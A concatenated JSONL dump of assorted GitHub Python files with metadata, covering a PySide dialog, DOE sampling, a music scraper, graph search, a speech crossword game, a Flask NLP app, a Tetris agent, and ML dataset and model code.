list(map(lambda x: x[0], mysel.description))\n\n columnNames.remove('ID')\n columnNames.remove('Name')\n columnNames.remove('Job')\n columnNames.remove('Email')\n\n for columnName in columnNames:\n chkBox = QCheckBox(columnName)\n self.__chkBoxes.append(chkBox)\n lay.addWidget(chkBox)\n\n groupBox = QGroupBox()\n groupBox.setLayout(lay)\n\n self.__okBtn = QPushButton('OK')\n self.__okBtn.clicked.connect(self.accept)\n\n closeBtn = QPushButton('Close')\n closeBtn.clicked.connect(self.close)\n\n lay = QHBoxLayout()\n lay.addWidget(self.__okBtn)\n lay.addWidget(closeBtn)\n lay.setContentsMargins(0, 0, 0, 0)\n\n bottomWidget = QWidget()\n bottomWidget.setLayout(lay)\n\n lay = QVBoxLayout()\n lay.addWidget(groupBox)\n lay.addWidget(bottomWidget)\n\n self.setLayout(lay)\n\n self.setFixedSize(self.sizeHint().width(), self.sizeHint().height())\n\n def getColumnNames(self):\n return [checkbox.text() for checkbox in self.__chkBoxes if checkbox.isChecked()]\n","repo_name":"yjg30737/pyside-db-chart-mapping-example","sub_path":"pyside_db_chart_mapping_example/db/delColDialog.py","file_name":"delColDialog.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"14269141941","text":"import numpy as np\nnp.random.seed(42)\nimport os\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nfrom skopt.space import Space\nfrom skopt.sampler import Lhs\nfrom scipy.spatial.distance import 
pdist\nfrom explann_doe import fullfact, ff2n, ccdesign\nimport pandas as pd\nimport configparser\n\nclass CaseConfigParser(configparser.ConfigParser):\n def optionxform(self, optionstr):\n return optionstr\n\ndef config_to_dict(config):\n new_dict = {}\n for k, v in config._sections.items():\n new_dict[k] = {}\n for k_, v_ in v.items():\n try:\n new_dict[k][k_] = eval(v_)\n except:\n new_dict[k][k_] = v_\n return new_dict\n\ndef write_lhs_file(doe_variables, samples, path):\n variable_constants = []\n variable_variables = []\n variable_ranges = doe_variables.values()\n labels=','.join(['ID'] + [key for key in doe_variables.keys()])\n \n for var in variable_ranges:\n if not isinstance(var, tuple):\n variable_constants.append(var)\n elif var[0] == var[1]:\n variable_constants.append(var[0])\n else:\n variable_variables.append(var)\n\n space = Space(variable_variables)\n lhs = Lhs(criterion=\"maximin\", iterations=10000)\n x = lhs.generate(space.dimensions, samples)\n\n for xi in x:\n [xi.append(var) for var in variable_constants]\n\n p = Path(path)\n p.parent.mkdir(parents=True, exist_ok=True)\n with open(path, 'w') as f:\n f.write(f'{labels}\\n')\n for i in range(len(x)):\n f.write(f'{i+1}')\n for j in range(len(np.array(x)[i,:])):\n f.write(f', {np.array(x)[i,j]}')\n f.write('\\n')\n print(path)\n\ndef write_doe_file(config_file):\n\n config = CaseConfigParser()\n config.read(config_file)\n config = config_to_dict(config)\n\n \n DOE_VARIABLES = config['DOE_VARIABLES']\n #SAMPLES = config['DATASET']['SAMPLES']\n DOEFILE = config['DATASET']['DOEFILE']\n DATASET_ROOT = config['DATASET']['DATASET_ROOT']\n DOEFILE_PATH = f\"{Path(DATASET_ROOT) / Path(DOEFILE).resolve()}\"\n os.makedirs(Path(DOEFILE_PATH).resolve().parent, exist_ok=True)\n\n NVARS = config['DOE_VARIABLES'].__len__()\n ### ccc stands for central composite circunscribed\n DOE_FUNCTION = config['DOE_SAMPLING']['FUNCTION']\n KWARGS = config['DOE_SAMPLING_KWARGS']\n\n experimental_planning = DOE_FUNCTION(NVARS, **KWARGS )\n\n levels = np.unique(experimental_planning)\n\n DOE_VARIABLES_LEVELS = {}\n for var, var_range in DOE_VARIABLES.items():\n DOE_VARIABLES_LEVELS[var] = np.interp(levels, (levels.min(), levels.max()), var_range)\n\n np.set_printoptions(precision=5, suppress=True)\n\n converted_levels = np.array([array for array in DOE_VARIABLES_LEVELS.values()])\n \n experimental_planning_converted = np.copy(experimental_planning)\n for i in range(experimental_planning.shape[1]):\n experimental_planning_converted[:,i] = experimental_planning[:,i]*(converted_levels[i][-2]-np.mean(converted_levels[i])) + np.mean(converted_levels[i])\n\n experimental_planning_converted_ids = np.concatenate([np.arange(1,experimental_planning_converted.shape[0]+1)[:,None],experimental_planning_converted], axis=1)\n experimental_planning_converted_ids_dataframe = pd.DataFrame(data=experimental_planning_converted_ids, columns=['ID','Thickness','CP3_y','T0in','p0in','outerTemperature'])\n experimental_planning_converted_ids_dataframe.to_csv(DOEFILE_PATH, sep=',', index=False)\n \n","repo_name":"properallan/ihtc_repository","sub_path":"src/doe_sampling.py","file_name":"doe_sampling.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42637257861","text":"\"\"\"\r\nModule to get today's top songs and playlists from Jio Saavn platform\r\n\"\"\"\r\n\r\nimport requests\r\nfrom bs4 import 
BeautifulSoup\r\n\r\n\r\ntopics_url='https://www.jiosaavn.com/new-releases/english'\r\nplaylists_url='https://www.jiosaavn.com/featured-playlists/english'\r\n\r\ndef music():\r\n response=requests.get(topics_url)\r\n r2=requests.get(playlists_url)\r\n\r\n page_contents=response.text\r\n page_contents2=r2.text\r\n\r\n doc= BeautifulSoup(page_contents,'html.parser')\r\n doc2= BeautifulSoup(page_contents2,'html.parser')\r\n a_tags=doc.find_all('a',class_='u-ellipsis u-color-js-gray')\r\n a_playlist_tags=doc2.find_all('a',class_='u-ellipsis u-color-js-gray')\r\n\r\n counter=1\r\n string1='___Top 10 Trending Songs___\\n'\r\n for i in a_tags[:10]:\r\n string1=string1+str(counter)+' -> '+i.text+'\\n'\r\n counter=counter+1\r\n\r\n counter=1\r\n string2='___Top 10 Trending Playlists___\\n'\r\n for i in a_playlist_tags[:10]:\r\n string2=string2+str(counter)+' -> '+i.text+'\\n'\r\n counter=counter+1\r\n \r\n return string1,string2 \r\n","repo_name":"sejalc22/Discord-Bot-for-Content-Aggregation-and-Summarization","sub_path":"music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15264089549","text":"import sys\nfrom collections import deque\nread=sys.stdin.readline\n# DFS 정의\ndef dfs(graph,start,visited):\n global cnt\n visited[start]=True\n for node in graph[start]:\n if not visited[node]:\n cnt+=1\n dfs(graph,node,visited)\n \n\n# 컴퓨터 수\nN=int(read())\n# 컴퓨터 연결된 쌍의 수\nM=int(read())\n\ngraph=[[] for _ in range(N+1)]\n\nfor _ in range(M):\n a,b=map(int,read().split())\n graph[a].append(b)\n graph[b].append(a)\n\nvisited_arr=[False]*(N+1)\ncnt=0\ndfs(graph,1,visited_arr)\nprint(cnt)\n","repo_name":"commGom/pythonStudy","sub_path":"백준/210803_최단경로/2606바이러스_DFS.py","file_name":"2606바이러스_DFS.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42118666207","text":"import sys\n\nsys.path.insert(0, \"../../../\")\nimport sys\nimport os\nimport time\nimport subprocess\nimport threading\nfrom API import recorder, edit\n\nlock = threading.Lock()\nstart = round(time.time())\n\n\ndef meaning(w):\n with open(\"words.csv\", \"r\") as r:\n for line in r:\n word = line[:len(line) - 1].split(\",\")\n if word[0] == w:\n return word[1:]\n return\n\n\nmean = []\nfor i in range(1, 5):\n mean.append(meaning(sys.argv[i]))\n\n\ndef check(str1, l, w):\n print(\" Input is \" + l)\n for j in range(4):\n if l == w[j] and string[j] == \"-\":\n str1 = str1 + l\n else:\n str1 = str1 + string[j]\n return str1\n\n\ndef formation(w, q):\n print(\"Meaning of the word is: \")\n for meaning in mean[q]:\n print(meaning)\n\n k = 0\n str1 = \"\"\n global string\n string = \"\"\n if \"-\" not in w[:]:\n for i in range(0, len(w)):\n string = string + \"-\"\n for i in range(0, len(string)):\n str1 = str1 + string[i] + \" \"\n else:\n string = w\n str1 = w\n print(str1)\n str1 = \"\"\n while k < 15:\n k = k + 1\n str1 = \"\"\n letter = \"\"\n print(\"Enter letter: \")\n with lock:\n record = recorder.Recorder(\"../../../Language_Models/\", \"../../../Acoustic_Models/\", L_LIB=\"characters\",\n A_LIB=\"en-us\", DECODE=True, TRIALS=1,\n SILENCE=1)\n record.start()\n r = open('./test.hyp', 'r')\n arr = r.read().split(\" \")\n letter = arr[0]\n print(letter)\n lt = letter.lower()\n r.close()\n try:\n string = str(check(str1, lt, w))\n\n except Exception as e:\n print(e)\n\n str1 = \"\"\n for j in range(0, len(string)):\n 
str1 = str1 + string[j] + \" \"\n print(str1)\n if string == q or k == 15:\n return string\n elif int(round(time.time()) - start) >= 180:\n subprocess.call([\"espeak\", \"You lose\"])\n break\n return \"End\"\n\n\noutput = [\"\" for j in range(4)]\nmatrix = [[\"\" for x in range(4)] for y in range(4)]\n\n\ndef display():\n text = \"\"\n if output[0] != \"\":\n for t in range(4):\n matrix[int(sys.argv[5])][t] = output[0][t]\n if output[1] != \"\":\n for t in range(4):\n matrix[t][int(sys.argv[6])] = output[1][t]\n if output[2] != \"\":\n for t in range(4):\n matrix[t][int(sys.argv[6]) + 2] = output[2][t]\n if output[3] != \"\":\n for t in range(4):\n matrix[int(sys.argv[5]) + 2][t] = output[3][t]\n for i in range(4):\n for j in range(4):\n if matrix[i][j] == \"\":\n text = text + \"-\" + \" \"\n else:\n text = text + matrix[i][j] + \" \"\n print(text)\n text = \"\"\n\n\nn = 0\ns = 0\nm = 0\nz = 1\nwhile z:\n if len(output[n % 4]) == 0 and output[n % 4] != \"End\":\n output[n % 4] = formation(sys.argv[(n % 4) + 1], n % 4)\n m = m + 1\n print(m)\n elif output[n % 4] != sys.argv[(n % 4) + 1] and output[n % 4] != \"End\":\n output[n % 4] = formation(output[n % 4], n % 4)\n\n elif output[n % 4] == sys.argv[(n % 4) + 1] and output[n % 4] != \"End\":\n s = s + 1\n if s >= 4:\n subprocess.call([\"espeak\", \"You win\"])\n z = 0\n if output[n % 4] == \"End\":\n z = 0\n else:\n display()\n n = n + 1\n\nsubprocess.call([\"espeak\", \"-s\", \"125\", \" Options are 1: Resume and 2: Start another game\"])\n","repo_name":"AnirbanBanik1998/Modern_Speak_and_Spell","sub_path":"Game/Games/Crossword/maker.py","file_name":"maker.py","file_ext":"py","file_size_in_byte":3563,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"8585510879","text":"from estudiante import Estudiante\n\ndef run ():\n alumnos = []\n calificaciones = {}\n while (True):\n\n print(\"\"\"\n Bienvenido al programa para calcular notas de estudiantes.\n 1) para ingresar los nombres de los alumnos\n 2) para ingresar las notas\n 3) para imprimir alumno con su promedio\n 4) salir\n\n Digita tu opcion:\n \"\"\")\n\n entrie = int(input())\n\n if entrie == 1:\n print(\" ingresa la cantidad de alumnos: \")\n cant = int(input())\n \n for i in range(cant):\n \n name = input(f'ingresa el nombre del estudiante {i+1}: ')\n newperson = Estudiante(name)\n alumnos.append(newperson)\n\n if entrie == 2:\n\n for i in alumnos:\n print (f'ingrese las notas de {i.name}')\n nota1 = int(input(\"ingresa nota1: \"))\n nota2 = int(input(\"ingresa nota2: \"))\n nota3 = int(input(\"ingresa nota3: \"))\n nota4 = int(input(\"ingresa nota4: \"))\n nota5 = int(input(\"ingresa nota5: \"))\n\n name = i.name\n notafinal = i.promedio(nota1,nota2,nota3,nota4,nota5)\n\n calificaciones[name] = notafinal\n\n \n \n if entrie == 3:\n for alumno, nota in calificaciones.items():\n print (alumno + ' tuvo un promedio de : ' + str(nota))\n \n \n if entrie ==4:\n break\n\n \n \n \n\nif __name__ == '__main__':\n run()","repo_name":"felipedcp20/Ejercicios-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29069218037","text":"from flask import Flask\nfrom flask import render_template\nfrom logging.config import dictConfig\nfrom flask import request\nfrom flask import jsonify\nfrom google.cloud import language_v1\n\ndictConfig({\n 'version': 1,\n 'formatters': {'default': {\n 'format': 
'[%(asctime)s] %(levelname)s in %(module)s: %(message)s',\n }},\n 'handlers': {'wsgi': {\n 'class': 'logging.StreamHandler',\n 'stream': 'ext://flask.logging.wsgi_errors_stream',\n 'formatter': 'default'\n }},\n 'root': {\n 'level': 'INFO',\n 'handlers': ['wsgi']\n }\n})\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef hello_world():\n return \"

Hello, alireza!

\"\n\n@app.route('/index')\ndef hello():\n return render_template('index.html')\n\n@app.route('/sentiment',methods=['POST'])\ndef sentiment():\n if request.method == 'POST':\n\n client = language_v1.LanguageServiceClient()\n document = language_v1.Document(content=request.get_json()['payload'], type_=language_v1.Document.Type.PLAIN_TEXT)\n sentiment = client.analyze_sentiment(request={'document': document}).document_sentiment\n # print(\"Text: {}\".format(text))\n #print(\"Sentiment: {}, {}\".format(sentiment.score, sentiment.magnitude))\n Sent=\"Undecided\"\n if sentiment.score > (.1) :\n Sent=\"Possitive\"\n elif sentiment.score < (-.1) :\n Sent=\"Negative\"\n else:\n Sent= \"Neutral\"\n resp = \"Sentiment: {} The score is: \".format(Sent) + str(round(sentiment.score,2)) + \", \" + str(round(sentiment.magnitude,2))\n response = {\"message\":resp}\n return jsonify(response)\n\n@app.route('/entity',methods=['POST'])\ndef entity():\n if request.method == 'POST':\n\n client = language_v1.LanguageServiceClient()\n type_ = language_v1.Document.Type.PLAIN_TEXT\n language = \"en\"\n document = language_v1.Document(content=request.get_json()['payload'], type_=language_v1.Document.Type.PLAIN_TEXT, language= language)\n encoding_type = language_v1.EncodingType.UTF8\n response = client.analyze_entities(request = {'document': document, 'encoding_type': encoding_type})\n resp=''\n for entity in response.entities:\n resp += \"Entity: {}\".format(entity.name) +\"--> \" + \"Entity type: {}\".format(language_v1.Entity.Type(entity.type_).name) + \"\\n\"\n print(\"Entity: {}\".format(resp))\n response = {\"message\":resp}\n return jsonify(response)\n\n@app.route('/class',methods=['POST'])\ndef classify():\n if request.method == 'POST':\n\n client = language_v1.LanguageServiceClient()\n type_ = language_v1.Document.Type.PLAIN_TEXT\n\n language = \"en\"\n document = language_v1.Document(content=request.get_json()['payload'], type_=language_v1.Document.Type.PLAIN_TEXT, language= language)\n response = client.classify_text(request = {'document': document })\n resp=''\n for category in response.categories:\n resp+= u\"Category name: {}\".format(category.name) + \"--> \" + \"Confidence: {}\".format(round(category.confidence,2)) + \"\\n\"\n\n print(\"Class: {}\".format(resp))\n response = {\"message\":resp}\n return jsonify(response)\n\n@app.route('/summerize',methods=['POST'])\ndef summerize():\n if request.method == 'POST':\n\n client = language_v1.LanguageServiceClient()\n type_ = language_v1.Document.Type.PLAIN_TEXT\n\n language = \"en\"\n document = language_v1.Document(content=request.get_json()['payload'], type_=language_v1.Document.Type.PLAIN_TEXT, language= language)\n encoding_type = language_v1.EncodingType.UTF8\n response = client.classify_text(request = {'document': document})\n resp=''\n for category in response.categories:\n resp+= u\"Category name: {}\".format(category.name) + \" \" + \"Confidence: {}\".format(category.confidence) + \" \"\n\n print(\"Class: {}\".format(resp))\n response = {\"message\":resp}\n return jsonify(response)\n","repo_name":"alexmofidi/Flask_app","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23610551680","text":"import pygame\nfrom pygame.locals import QUIT\nfrom tetris.utils import read_yaml_file, initialize_pygame, draw\nfrom tetris.project_root_path import project_root_path\nfrom tetris.agent.agent import LinearAgent, 
NNAgent\nfrom tetris.environment.environment import TetrisEnvironment\nimport numpy as np\nfrom pathlib import Path\nimport pickle\nfrom typing import Dict, Any\nimport sys\n\n\ndef showcase_agent_play(config: Dict[str, Any]) -> None: # noqa\n trained_agent_path = project_root_path / Path(config[\"trained_agent_file_path\"])\n if config[\"agent_type\"] == \"linear\":\n agent = LinearAgent(np.load(trained_agent_path))\n elif config[\"agent_type\"] == \"nn\":\n with open(trained_agent_path, \"rb\") as f:\n agent = NNAgent(*pickle.load(f).values())\n else:\n raise RuntimeError(f\"Agent type '{agent}' not supported.\")\n\n env = TetrisEnvironment()\n\n display, clock, fps, rectangle_size, font = initialize_pygame(config[\"pygame_config\"])\n\n games_played = 0\n lines_cleared = 0\n\n while True:\n board_representations = env.return_board_representations()\n scored_representations = {k: agent.evaluate_state(v) for k, v in board_representations.items()}\n best_placement = max(scored_representations, key=scored_representations.get)\n target_rotation, target_x, target_y = best_placement\n while env.rotation != target_rotation or env.tetromino_x != target_x or env.tetromino_y != target_y:\n action = 0\n if action == 0 and env.rotation != target_rotation:\n env.rotation += 1\n action = 1\n if action == 0 and env.tetromino_x != target_x:\n if env.tetromino_x < target_x:\n env.tetromino_x += 1\n else:\n env.tetromino_x -= 1\n action = 1\n if action == 0 and env.tetromino_y != target_y:\n env.tetromino_y += 1\n action = 1\n draw(\n display=display,\n board=env.board,\n tetromino=env.tetromino,\n rotation=env.rotation,\n tetromino_x=env.tetromino_x,\n tetromino_y=env.tetromino_y,\n rectangle_size=rectangle_size,\n next_tetromino=env.next_tetromino,\n lines_cleared=lines_cleared,\n games_played=games_played,\n font=font,\n )\n clock.tick(fps)\n lines_cleared, games_played = env.process_best_placement(best_placement, lines_cleared, games_played)\n\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n\ndef main():\n config = read_yaml_file(project_root_path / Path(\"config.yaml\"))\n showcase_agent_play(config)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"chingismaksimov/tetris_v2","sub_path":"tetris/showcase_agent_play.py","file_name":"showcase_agent_play.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43034678526","text":"class Solution:\n def capitalizeTitle(self, title: str) -> str:\n title=title.lower()\n words=title.split()\n res=\"\"\n for word in words:\n if len(word)>2:\n word=word.title()\n res=res+word+\" \"\n return res[:-1]\n","repo_name":"SPFA-newbie/leet-code-answer","sub_path":"#2129.py","file_name":"#2129.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29343624989","text":"#Cálculo del dígito verificador de un rut\nrut=input()\nrut=[int(rut[i]) for i in reversed(range(len(rut)))]\nmul=list(range(2,8))*2\nlistos=[rut[i]*mul[i] for i in range(len(rut))]\nn=sum(listos)%11\nif(n==0):\n\tprint('dv= 0')\nelif(n==1):\n\tprint('dv= 
k')\nelse:\n\tprint('dv=',11-n)","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej5/hito1_ej5_6e92a933d2498847f9a1bdfbf87b6438.py","file_name":"hito1_ej5_6e92a933d2498847f9a1bdfbf87b6438.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35615731157","text":"n = int(input())\nif n < 0:\n n = abs(n)\n r = n % 100\n n //= 100\n digits = [int(d) for d in list(str(r))]\n if len(digits) == 1:\n digits.append(0)\n mini = min(digits)\n n = -1 * int(str(n) + str(mini))\nprint(n)\n","repo_name":"ciberdiego123/python-coding","sub_path":"Ilya_Bank_Account.py","file_name":"Ilya_Bank_Account.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11537422848","text":"import os\nimport glob\nimport scipy\nimport torch\nimport random\nimport numpy as np\nimport torchvision.transforms.functional as F\nfrom torch.utils.data import DataLoader\nfrom PIL import Image\nfrom scipy.misc.pilutil import imread, imsave\n# from imageio import imread, imsave\nfrom skimage.feature import canny\nfrom skimage.color import rgb2gray, gray2rgb\nfrom .utils import create_extrapolation_mask\nnp.set_printoptions(threshold=10000000)\nimport time\n\nclass Dataset(torch.utils.data.Dataset):\n def __init__(self, config, flist, augment=True, mask_type = None):\n super(Dataset, self).__init__()\n self.augment = augment\n self.data = self.load_flist(flist)\n self.loaded_img_size = config.LOADED_IMAGE_SIZE\n self.mask = mask_type\n if mask_type is None:\n self.mask = config.MASK\n \n # in test mode, there's a one-to-one relationship between mask and image\n # masks are loaded non random\n if config.MODE == 2:\n self.mask = 7\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n try:\n item = self.load_item(index)\n except:\n print('loading error: ' + self.data[index])\n item = self.load_item(0)\n\n return item\n\n def load_name(self, index):\n name = self.data[index]\n print('loading name...', name)\n return os.path.basename(name)\n\n def load_item(self, index):\n\n size = self.loaded_img_size # Assume the input imgs' height and width are the same.\n\n # load image\n img = imread(self.data[index])\n\n # gray to rgb\n if len(img.shape) < 3:\n img = gray2rgb(img)\n\n # resize/crop if needed\n if size != 0:\n img = self.resize(img, size, size)\n \n # load mask\n mask, mask_information = self.load_mask(size)\n mask = np.expand_dims(mask, axis=0)\n # mask_information = np.expand_dims(mask_information, axis=0)\n # augment data\n if self.augment and np.random.binomial(1, 0.5) > 0:\n img = img[:, ::-1, ...].copy()\n mask = mask[:, ::-1, ...].copy()\n mask_information = mask_information.copy() #[1,4]\n temp = mask_information[2] \n mask_information[2] = size - mask_information[3]\n mask_information[3] = size - temp\n # mask#####\n \n # print('Get dataset item...', torch.from_numpy(unlbl_binary_mask).float().shape, torch.from_numpy(unlbl_binary_mask).float())\n # return self.to_tensor(img), self.to_tensor(img_gray), (torch.from_numpy(semantic)).float(), (torch.from_numpy(unlbl_binary_mask)).float(), (torch.from_numpy(smt_one_hot)).float(), self.to_tensor(edge), (torch.from_numpy(mask)).float()\n return self.to_tensor(img), (torch.from_numpy(mask)).float(), torch.from_numpy(mask_information).float() \n # [3, 256, 256], [1, 256, 256], [1, 256, 256], [20, 256, 256], [1, 256, 256]\n \n\n def onehot_enc(self, 
smt):#smt.shape = [256, 256] #but if any pixel is unlbled, I set 19-dim vector to 0 vector. \n _, w, h = smt.shape\n # print('w,h =',w,h)\n smt_flat = smt.flatten()\n # print(smt_flat)\n voidpart = (smt_flat==self.ignore_index)\n nonvoid_pix = []\n for i in range(len(voidpart)):\n if voidpart[i] == 0:\n nonvoid_pix.append(i)\n\n # print('smt_flat.shape =',smt_flat.shape)\n onehot = np.zeros((w*h, self.NUM_CLASSES))\n onehot[nonvoid_pix, smt_flat[nonvoid_pix]] = 1\n # print('onehot.shape =',onehot.shape)\n onehot = onehot.reshape((w, h, self.NUM_CLASSES))\n onehot = np.transpose(onehot, (2,0,1)) \n return onehot \n\n def load_mask(self, size):######################################################### 做完去確定image dataset沒問題 就可以下去train了\n # print('load_mask, img.shape =', img.shape)#(256, 256, 3)\n mask_type = self.mask\n if mask_type == 1:\n top = np.random.randint(0, 128)#128-16\n bot = 128+top\n left = np.random.randint(0, 128)#128-16\n right = 128+left\n mask, mask_inf = create_extrapolation_mask(size, size, crop_pos=(top, bot, left, right))\n \n # extrapolation mask (middle white, periphery black) \n if mask_type == 2:\n mask, mask_inf = create_extrapolation_mask(size, size)\n \n return mask, mask_inf\n \n def to_tensor(self, img):\n img = Image.fromarray(img)\n img_t = F.to_tensor(img).float()\n return img_t\n\n def resize(self, img, height, width, centerCrop=True, mode=None):\n imgh, imgw = img.shape[0:2]\n\n if centerCrop and imgh != imgw:\n # center crop\n side = np.minimum(imgh, imgw)\n j = (imgh - side) // 2\n i = (imgw - side) // 2\n img = img[j+side//30:j + 29*side//30, i+side//30:i + 29*side//30, ...]\n\n img = scipy.misc.imresize(img, [height, width],interp='nearest', mode=mode)\n\n return img\n\n def load_flist(self, flist):\n if isinstance(flist, list):\n return flist\n\n # flist: image file path, image directory path, text file flist path\n if isinstance(flist, str):\n if os.path.isdir(flist):\n flist = list(glob.glob(flist + '/*.jpg')) + list(glob.glob(flist + '/*.png'))\n flist.sort()\n return flist\n\n if os.path.isfile(flist):\n try:\n return np.genfromtxt(flist, dtype=np.str, encoding='utf-8')\n except:\n return [flist]\n\n return []\n\n def create_iterator(self, batch_size):\n while True:\n sample_loader = DataLoader(\n dataset=self,\n batch_size=batch_size,\n drop_last=True\n )\n\n for item in sample_loader:\n yield item\n","repo_name":"tpbrandon01/Cool-Outpainting","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":6005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40674784500","text":"import logging\nimport os\nfrom unittest import TestCase\n\nimport numpy as np\nimport pytest\n\nfrom aspire.denoising import adaptive_support\nfrom aspire.source import ArrayImageSource\nfrom aspire.utils import gaussian_2d\n\nlogger = logging.getLogger(__name__)\n\nDATA_DIR = os.path.join(os.path.dirname(__file__), \"saved_test_data\")\n\n\nclass AdaptiveSupportTest(TestCase):\n def setUp(self):\n self.size = 1025\n self.sigma = 16\n self.n_disc = 10\n\n # Reference thresholds. 
Since we're integrating 2 * r * exp(-r ** 2 /\n # (2 * sigma ** 2)), the thresholds corresponding to one, two, and\n # three standard deviations are the following.\n self.references = {\n 1: 1 - np.exp(-1 / 2),\n 2: 1 - np.exp(-(2**2) / 2),\n 3: 1 - np.exp(-(3**2) / 2),\n }\n\n def testAdaptiveSupportBadThreshold(self):\n \"\"\"\n Method should raise meaningful error when passed unreasonable thresholds.\n \"\"\"\n\n discs = np.empty((self.size, self.size)) # Intentional Dummy Data\n img_src = ArrayImageSource(discs)\n\n with pytest.raises(ValueError, match=r\"Given energy_threshold.*\"):\n _ = adaptive_support(img_src, -0.5)\n\n with pytest.raises(ValueError, match=r\"Given energy_threshold.*\"):\n _ = adaptive_support(img_src, 9000)\n\n def testAdaptiveSupportIncorrectInput(self):\n \"\"\"\n Method should raise meaningful error when passed wrong format input.\n \"\"\"\n\n with pytest.raises(\n RuntimeError,\n match=\"adaptive_support expects `Source` instance or subclass.\",\n ):\n # Pass numpy array.\n _ = adaptive_support(np.empty((10, 32, 32)))\n\n def test_adaptive_support_F(self):\n \"\"\"\n Test Fourier support of Gaussian relates to normal distribution.\n \"\"\"\n\n # Generate stack of 2D Gaussian images.\n imgs = np.tile(\n gaussian_2d(self.size, sigma=self.sigma),\n (self.n_disc, 1, 1),\n )\n\n # Setup ImageSource like objects\n img_src = ArrayImageSource(imgs)\n\n for ref, threshold in self.references.items():\n c, R = adaptive_support(img_src, threshold)\n\n # Assert spatial support is close to normal.\n R_true = ref * self.sigma\n\n # Standard deviation in Fourier space is given by 1/(2 * pi *\n # sigma). This can be obtained by applying the Poisson summation\n # formula to the continuous FT which gives that the discrete FT is\n # well approximated by a Gaussian with that particular standard\n # deviation.\n c_true = ref / (2 * np.pi * self.sigma)\n\n # Since we're dealing with the square of the Gaussian, this\n # effectively divides the sigmas by sqrt(2).\n R_true /= np.sqrt(2)\n c_true /= np.sqrt(2)\n\n # Accuracy is not perfect, but within 5% if sigma is in the right\n # range (too small, R is inaccurate; too big, c is inaccurate.\n self.assertTrue(abs(R - R_true) / R_true < 0.05)\n self.assertTrue(abs(c - c_true) / c_true < 0.05)\n","repo_name":"ComputationalCryoEM/ASPIRE-Python","sub_path":"tests/test_adaptive_support.py","file_name":"test_adaptive_support.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"77"} +{"seq_id":"6022522039","text":"from set1.challenge3 import decode_single_xor\n# read file line by line\nfd = open(\"ch4.txt\", \"r\")\nlines = fd.readlines()\nfinal_result = []\nfor item in lines:\n print(item)\n result = decode_single_xor(item[:-1])\n final_result += result\nfor item in final_result:\n print(f'{bytes.fromhex(item[0])}: {item[1]}')\n","repo_name":"Atomnp/cryptopals","sub_path":"set1/challenge4.py","file_name":"challenge4.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73195890808","text":"from __future__ import absolute_import\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import init\nfrom torchvision import models\n\n__all__ = ['PCB']\n\n\ndef weights_init_kaiming(m):\n classname = m.__class__.__name__\n if classname.find('Conv2d') != -1:\n init.kaiming_normal_(m.weight.data, mode='fan_out', nonlinearity='relu')\n elif classname.find('Linear') != 
-1:\n init.kaiming_normal(m.weight.data, a=0, mode='fan_out')\n init.constant(m.bias.data, 0.0)\n elif classname.find('BatchNorm1d') != -1:\n init.normal(m.weight.data, 1.0, 0.02)\n init.constant(m.bias.data, 0.0)\n elif classname.find('BatchNorm2d') != -1:\n init.constant(m.weight.data, 1)\n init.constant(m.bias.data, 0)\n\n\ndef weights_init_classifier(m):\n classname = m.__class__.__name__\n if classname.find('Linear') != -1:\n init.normal(m.weight.data, std=0.001)\n init.constant(m.bias.data, 0.0)\n\n\n# Defines the new fc layer and classification layer\n# |--Linear--|--bn--|--relu--|--Linear--|\nclass ClassBlock(nn.Module):\n def __init__(self, input_dim, class_num, relu=True, num_bottleneck=512):\n super(ClassBlock, self).__init__()\n add_block = []\n\n add_block += [nn.Conv2d(input_dim, num_bottleneck, kernel_size=1, bias=False)]\n add_block += [nn.BatchNorm2d(num_bottleneck)]\n if relu:\n add_block += [nn.ReLU(inplace=True)]\n add_block = nn.Sequential(*add_block)\n add_block.apply(weights_init_kaiming)\n\n classifier = []\n classifier += [nn.Linear(num_bottleneck, class_num)]\n classifier = nn.Sequential(*classifier)\n classifier.apply(weights_init_classifier)\n\n self.add_block = add_block\n self.classifier = classifier\n\n def forward(self, x):\n x = self.add_block(x)\n x = torch.squeeze(x)\n x = self.classifier(x)\n return x\n\n\n# Part Model proposed in 